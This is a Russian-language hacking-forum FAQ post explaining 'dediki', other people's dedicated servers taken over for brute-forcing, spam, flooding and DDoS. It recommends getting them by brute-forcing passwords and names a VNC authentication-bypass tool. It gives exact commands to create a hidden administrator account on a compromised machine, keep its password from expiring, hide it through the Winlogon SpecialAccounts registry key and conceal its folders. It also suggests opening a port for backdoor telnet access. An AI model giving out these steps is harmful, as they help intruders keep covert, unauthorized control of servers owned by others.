[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Flex, fraerok, _DarkNight_  
Форум » Халява » Дедики » Что такое дедик и зачем он нужен? (FAQ)
Что такое дедик и зачем он нужен?
Flex Дата: Четверг, 09.06.2011, 13:22 | Сообщение # 1


Сообщений: 166
Награды: 7
Репутация: 6
Что такое дедик, зачем он нужен?
Дедик - очевидно, пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации. И больше не спрашивайте что это такое!!!

Как подключиться к дедику?

Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика.

Для чего нужен дедик?
Ну к примеру для брута, флуда, спама icq, мыла, для Ddos. Приведу пример: Ты хочешь иметь красивый номер ICQ :realangel: но не хочешь ставить брут на свой компьютер. Так как это долго, и слишком грузит твой компьютер. Для этого есть дедик! Ставь брут на дедик, выключай свой компьютер, и иди гуляй. Возвращяешся через несколько часов, и забирай свои красивенькие номера на здоровье!

Где достать дедик?
Есть несколько способов добыть дедик!

1. Взять в халяве. (Но, не советую там брать! Большинство дедиков не работает!)
2. Взломать! (сбрутить)
Как залить файлы на дедик?
Запакуй все файлы, весь софт в один архив, залей на файлообменик например: slil.ru, depositfiles. И другие. Возьми ссылку на скачивание, зайди в браузер дедика, и скачай всё своё добро на дедик!:realangel:
Как маскироваться на дедике?
Итак как мы знаем, что у дедика есть свой хозяин! Это злой админ:smileha:! И если он узнает что мы пользуемся его дедиком. то он поменяет пароль от дедика. Итак...Как же маскироватьсяя на дедике, это один из главных вопросов, и сейчас я постараюсь дать вам на этот сложный вопрос ответ!
Для начала нужно создать нам свою учётку. Потому что если мы будем сидеть через учётку админа, то это 90% что он нас пропалит! А нам этого не надо! Итак читай внимательно как сделать на чужом дедике свою учётку, и скрыть её! Делать это мы будем через командную строку! Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней:
code:

net user (тут пишем логин и пароль учётки которую мы будем создовать! Делаем это через пробел.) /add
net localgroup Administrators (Тут указываем имя которое вы должны были указать в первой строке) /add
net localgroup "Remote Desktop Users" (Тут тоже указываем имя которое указали в строке выше) /add
net accounts /maxpwage:unlimited

Допустим вы хотите создать учётную запись с именем admin, и паролем test. Тогда у вас должно вот что получиться:
code:

net user admin test /add
net localgroup Administrators admin /add
net localgroup "Remote Desktop Users" admin /add
net accounts /maxpwage:unlimited

Надеюсь понятно!
Разберём каждую строку:
code:

net user Имя_пользователя пароль /add - Добавляет нового пользователя с указанным именем и паролем

net localgroup Administrators Имя_пользователя /add - Добавляет нужного пользователя к группе администраторов

net localgroup "Remote Desktop Users" Имя_пользователя /add - Добавляет нужного пользователя к группе удалённых пользоваелей

net accounts /maxpwage:unlimited - позволяет избежать истечения срока действия пароля (14 дней)

Едем дальше. Тепрь нам нужно скрыть учётку чтобы она не было видна среди других пользователей. Для этого заходим в Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0.
Дальше нам нужно скрыть папку с нашим акком, со всеми подкатологами, и файлами. Для этого идём в Cocuments and Settings и скрываем там нашу папку. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить)
Дальше идём в C:WINDOWSsystem32 и создаём папку (название любое) Но вот и всё теперь ты можешь спокойно заходить на дедик под своим логином, и паролем. Теперь после того как мы вошли под своим логином и паролем нужно скрыть папку которую мы сделали. Это делается правой кнопкой мыши.
Теперь несколько советов
1. никогда не остовляй файлы на рабочем столе. Даже под своей учёткой.

2. Не забывай скрывать свою папку с файлами.

3. Никогда не удоляй файлы котрые тебе не пренадлежат. Только в случае необходимости.

4. Если тебе дорог какойто дедик, и ты не хочешь его терять, то можешь открыть на нём порт 972, и подключаться через Telnet даже если дедик вырубят.




 
Форум » Халява » Дедики » Что такое дедик и зачем он нужен? (FAQ)
  • Страница 1 из 1
  • 1
Поиск: